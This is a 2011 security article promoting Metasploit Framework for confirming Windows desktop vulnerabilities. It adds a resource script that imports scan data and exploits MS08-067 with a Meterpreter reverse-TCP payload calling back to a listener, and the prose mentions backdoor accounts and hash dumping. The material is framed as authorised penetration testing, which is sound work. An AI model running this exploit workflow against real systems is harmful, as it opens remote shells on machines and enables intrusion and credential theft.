Anybody can run a vulnerability scanner, generate a report and claim to have found everything that matters on their Windows desktops. In fact, that very scenario takes place in the name of "compliance" every day. But what's the real value in relying solely on vulnerability scanners to tell you which vulnerabilities may -- or may not -- be present in your Windows environment? A scanner infers most of what it reports from version numbers, banners and patch inventories; it rarely confirms that a flaw can actually be exploited.
Don't get me wrong. We couldn't live without vulnerability scanners. The problem with vulnerability testing today is that scans are run, systems are flagged as "at risk," and then IT moves on to something else. In the end, Windows desktops are often left unpatched and unhardened, so they stay on the network as targets waiting to be exploited.
Windows security is all in how an organization approaches vulnerability testing and management. You can choose to go the traditional route and reach a security plateau, or you can take Windows vulnerability testing a few steps further and actually demonstrate, on your systems in your environment, what the vulnerabilities actually mean to your business. I can't think of a better way to do this than using the free and easy-to-use tool called Metasploit Framework.
Metasploit Framework is a unique open source tool that allows you to actually exploit the vulnerabilities you find when performing vulnerability scans (via scanners such as eEye Retina, QualysGuard and even Microsoft Baseline Security Analyzer). There are commercial alternatives to Metasploit Framework, including Core Impact, Immunity Canvas and even commercial versions of Metasploit sold by Rapid7. Everyone's needs are different, but I've found that if you need proof of how Windows desktop vulnerabilities are affecting your network, then all you need is the free version.
Metasploit has both a graphical user interface (GUI) and a command-line console (msfconsole). Administrators can use either to run exploit code and deliver payloads that do things such as open a remote Windows command shell, add a backdoor user account, dump password hashes for offline cracking, or run an executable -- all of which make desktop vulnerability testing far more valuable than a list of findings.
I've been surprised that so many people I've met in IT and information security have never heard of Metasploit or have never actually used it. That's like not using a network analyzer, an IP subnet calculator or the Sysinternals tool set -- how can you effectively manage and secure Windows desktops without these tools?
If you've never heard of Metasploit Framework or don't quite understand its potential value, take it for a spin. If you've heard of it but have been afraid to try it out, you really should. Metasploit is a security assessment tool that should be used even in the most basic security assessments. You'll likely use it the most in your internal desktop and server security assessments from the perspective of a trusted insider.
Keep in mind that someone armed with a basic vulnerability scanner and Metasploit doesn't even need a Windows login to find and exploit many of these Windows vulnerabilities: a missing patch on a network-facing service is exploitable by anyone who can reach the port. That's both the danger inherent in Windows desktops and the beauty of using such a tool to prove where things stand.
With Metasploit Framework, you no longer have to provide generic statements in your reports like, "There are missing patches," or, "Someone could exploit this vulnerability to run arbitrary code." Instead, by carving out 15 minutes of your vulnerability assessment projects, you can obtain tangible evidence showing what these Windows desktop security flaws really mean to the enterprise.
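The workflow described above, scan, import, confirm, exploit, collect evidence, fits in a single msfconsole resource script. The script below is an added example, not code from the original article or from the Metasploit project. It assumes a current Metasploit Framework (exploit modules take RHOSTS and check iterates over them), and the scan file, workspace name, evidence path, listener address and target address are placeholders for your own engagement. exploit/windows/smb/ms08_067_netapi is used only as a stand-in for whatever missing-patch finding your scanner actually reported; substitute the module that matches your finding.

```msf
# Metasploit resource script; run with:  msfconsole -r desktop_evidence.rc
# Added example, not the article's or Metasploit's own code.
# Assumptions (placeholders): scan export path, workspace name, evidence
# path, listener address, target address and the stand-in exploit module.

# Keep this engagement's hosts and findings separate from other work
workspace -a desktops-2011-07

# From here on, everything typed and everything returned lands in one file,
# which is the "tangible evidence" that goes into the report
spool /root/evidence/desktops-2011-07.txt

# Import the scanner's output (Nessus, Retina and Qualys exports are supported)
db_import /root/scans/desktops.nessus

# What did the scanner find, and which hosts expose SMB on TCP/445?
hosts
services -p 445

# Stand-in module: substitute the one that matches your scanner's finding
use exploit/windows/smb/ms08_067_netapi

# Point RHOSTS at every imported host with TCP/445 open
services -p 445 -R

# Non-destructive first: 'check' asks each target whether it looks vulnerable
# without firing the exploit. This is what separates a real missing patch
# from scanner noise. Note that some modules can only answer "Detected"
# rather than "Vulnerable"; read the verdict before going further.
check

# Exploit one host at a time, and only one that check reported as affected
# (address is an assumption). Memory-corruption exploits of this kind can
# crash the target, so do this with the system owner's explicit agreement.
set RHOSTS 192.168.1.50
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.10
exploit -z

# Evidence of success: the open session and a command run on the target
sessions -l
sessions -i 1 -c "hostname"

# Close the evidence file cleanly
spool off
```

The point of the ordering is the `check` before the `exploit`: it turns the scanner's "at risk" into a confirmed finding (or a false positive) with no risk to the host, and the spooled transcript replaces the generic "someone could run arbitrary code" sentence in the report with a session on a named machine.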
Just recently, I demonstrated to a client how simple it is for someone to exploit a missing patch vulnerability on a Windows server using Metasploit Framework. It took just minutes to show him, and the look on his face made it worth every second.
Stop documenting hypothetical Windows desktop vulnerability scenarios. Prove them using Metasploit Framework instead. It's one of the best ways to get people's attention for and acceptance of information security measures.
ABOUT THE AUTHOR:
Kevin Beaver is an information security consultant, expert witness and professional speaker at Atlanta-based Principle Logic LLC. With over 22 years of experience in the industry, Beaver specializes in performing independent security assessments revolving around information risk management. He has authored/co-authored 10 books on information security, including The Practical Guide to HIPAA Privacy and Security Compliance and Hacking For Dummies. In addition, Beaver is the creator of the Security On Wheels information security audio books and blog providing security learning for IT professionals on the go. He can be reached at www.principlelogic.com, and you can follow him on Twitter at @kevinbeaver.
This was first published in July 2011